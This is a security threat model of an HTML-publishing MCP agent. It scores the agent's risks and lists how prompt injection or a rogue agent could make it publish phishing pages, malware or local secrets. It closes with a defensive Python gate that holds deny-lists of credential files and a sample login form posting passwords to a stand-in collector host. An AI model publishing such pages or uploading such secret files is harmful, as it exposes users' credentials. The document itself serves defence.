EdgeOne Pages MCP — agentic threat model
The EdgeOne Pages MCP agent presents a high-risk profile due to its ability to instantly publish arbitrary agent-generated content directly to the public internet, creating a direct vector for hosting phishing pages, malware, or unauthorized content under a user's account.
OWASP AIVSS score rationale

| Agentic risk factor | Score | Notes |
| --- | --- | --- |
| Autonomy of Action | 0.80 | |
| Goal-Driven Planning | 0.30 | |
| Self-Modification | 0.10 | |
| Dynamic Tool Use | 0.70 | |
| Persistent Memory | 0.20 | |
| Contextual Awareness | 0.40 | |
| Dynamic Identity | 0.60 | |
| Multi-Agent Interactions | 0.50 | |
| Non-Determinism | 0.50 | |
| Opacity & Reflexivity | 0.40 | |
Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
MAESTRO 7-layer threat model
Per-layer threats for this agent, in MAESTRO layer order. Layers tagged "not certain from the listing" are general, caveated commentary where the public description did not pin that layer.

Layer 1, Foundation Models (not certain from the listing): The agent relies on external LLMs to generate the HTML/content. If the underlying model is reprogrammed or suffers from adversarial prompt injection, it can be coerced into generating malicious scripts, phishing templates, or defaced content to be deployed.

Layer 2, Data Operations (not certain from the listing): The agent does not explicitly mention a vector database or RAG pipeline, but any data operations feeding into the HTML generation could be poisoned to inject malicious payloads into the deployed web pages.

Layer 3, Agent Frameworks: The agent framework exposes highly sensitive tools ('deploy-html' and folder deployment) that can be easily misused by an orchestrator or via prompt injection to publish unauthorized files, sensitive local project directories, or credentials to the public web.

Layer 4, Deployment and Infrastructure: The agent interacts directly with Tencent EdgeOne's global CDN. The primary infrastructure threat is the exposure of local files during folder deployment and the consumption of the user's deployment credits/bandwidth, potentially leading to financial denial of service.

Layer 5, Evaluation and Observability (not certain from the listing): There is no mention of built-in guardrails, content moderation, or logging to inspect the HTML content for malicious patterns (like credential harvesting forms) before deploying it to the live URL.

Layer 6, Security and Compliance: The agent operates using the user's EdgeOne account credentials to provision public URLs. There is a lack of fine-grained authorization controls to restrict which domains or subdomains the agent is allowed to publish to, risking brand reputation damage.

Layer 7, Agent Ecosystem: In a multi-agent ecosystem, another compromised or rogue agent could generate malicious payloads and pass them to this MCP agent to automatically distribute malware or phishing campaigns globally without human intervention.
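The Agent Frameworks, Deployment and Infrastructure, and Evaluation and Observability threats above all reduce to the same missing control: nothing inspects a deployment request before the tool publishes it. The following is an added example of such a pre-deployment gate, written for this page and not code from EdgeOne Pages MCP or Tencent. It assumes a hypothetical wrapper that receives the file list of a folder deployment plus the rendered HTML of each page, and returns deploy, review or block. The deny-lists, allowed-host set and sample request are constructed for the example.

```python
"""Pre-deployment gate for an HTML-publishing MCP tool (added example, not
EdgeOne Pages MCP code). It models the check a defender would put in front of
a 'deploy-html' / deploy-folder tool: sensitive local files never leave the
project folder, and generated HTML is inspected for credential-harvesting
forms, redirects and foreign scripts before it reaches a public URL."""
from __future__ import annotations

import fnmatch
import posixpath
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed deny-lists; a real deployment would tune these per project.
SENSITIVE_DIRS = {".git", ".ssh"}
SENSITIVE_FILES = (".env", ".env.*", "*.pem", "*.key", "id_rsa*", "credentials.json")
# Rules that block a deploy outright; everything else is flagged for review.
BLOCKING = {"path-escape", "sensitive-dir", "sensitive-file", "credential-form-foreign"}


@dataclass(frozen=True)
class Finding:
    where: str   # file path (folder checks) or page path (HTML checks)
    rule: str
    detail: str


def check_folder(paths: list[str]) -> list[Finding]:
    """Flag files that must not be uploaded from a local project folder."""
    out: list[Finding] = []
    for p in paths:
        norm = posixpath.normpath(p)
        if norm.startswith("..") or norm.startswith("/"):
            out.append(Finding(p, "path-escape", "resolves outside the deploy folder"))
            continue
        *dirs, name = norm.split("/")
        hit = SENSITIVE_DIRS.intersection(dirs)
        if hit:
            out.append(Finding(p, "sensitive-dir", f"inside {sorted(hit)[0]}/"))
        elif any(fnmatch.fnmatch(name, g) for g in SENSITIVE_FILES):
            out.append(Finding(p, "sensitive-file", "matches deny-list"))
    return out


class _HtmlAudit(HTMLParser):
    """Collect risky constructs from one HTML document."""

    def __init__(self, page: str, allowed_hosts: set[str]) -> None:
        super().__init__()
        self.page, self.allowed = page, allowed_hosts
        self.findings: list[Finding] = []
        self._form_action: str | None = None   # None while not inside a <form>
        self._form_has_password = False

    def _foreign(self, url: str | None) -> bool:
        host = urlparse(url or "").hostname   # relative URLs have no host
        return host is not None and host.lower() not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "form":
            self._form_action, self._form_has_password = a.get("action") or "", False
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._form_action is None:
                self.findings.append(Finding(self.page, "password-input-outside-form", ""))
            self._form_has_password = True
        elif tag == "script" and self._foreign(a.get("src")):
            self.findings.append(Finding(self.page, "foreign-script", a.get("src") or ""))
        elif tag == "iframe" and self._foreign(a.get("src")):
            self.findings.append(Finding(self.page, "foreign-iframe", a.get("src") or ""))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(Finding(self.page, "meta-refresh", a.get("content") or ""))

    def handle_endtag(self, tag):
        # A password field is only judged once the enclosing form's action is known.
        if tag == "form" and self._form_action is not None:
            if self._form_has_password:
                rule = "credential-form-foreign" if self._foreign(self._form_action) else "credential-form"
                self.findings.append(Finding(self.page, rule, self._form_action))
            self._form_action = None


def audit_html(page: str, html: str, allowed_hosts: set[str]) -> list[Finding]:
    parser = _HtmlAudit(page, {h.lower() for h in allowed_hosts})
    parser.feed(html)
    parser.close()
    return parser.findings


def gate(folder_paths, pages: dict[str, str], allowed_hosts) -> tuple[str, list[Finding]]:
    """Return ('deploy' | 'review' | 'block', findings) for one deployment request."""
    findings = check_folder(folder_paths)
    for page, html in pages.items():
        findings += audit_html(page, html, allowed_hosts)
    if any(f.rule in BLOCKING for f in findings):
        return "block", findings
    return ("review" if findings else "deploy"), findings


# Constructed sample request: a folder that accidentally includes secrets and
# a generated login page that posts credentials to an unrelated host.
SAMPLE_FOLDER = ["index.html", "assets/app.js", ".env", ".git/config", "../outside.txt"]
SAMPLE_PAGES = {
    "index.html": (
        '<html><body><form action="https://collector.example.net/login">'
        '<input name="u"><input type="password" name="p"></form>'
        '<script src="https://cdn.example.com/lib.js"></script></body></html>'
    ),
}
ALLOWED_HOSTS = {"cdn.example.com"}

if __name__ == "__main__":
    decision, found = gate(SAMPLE_FOLDER, SAMPLE_PAGES, ALLOWED_HOSTS)
    print(decision)
    for f in found:
        print(f"  {f.rule:28} {f.where}: {f.detail}")
```

The gate is deliberately conservative in one direction only: a password form posting to a host outside the allow-list blocks the deploy, while a same-origin login form or a foreign script is surfaced for human review rather than silently rejected, since both have legitimate uses. Path checks run on the normalised path so that a traversal component anywhere in the list is caught before any file is read, which is the control the Layer 4 threat (exposure of local files during folder deployment) calls for.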
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).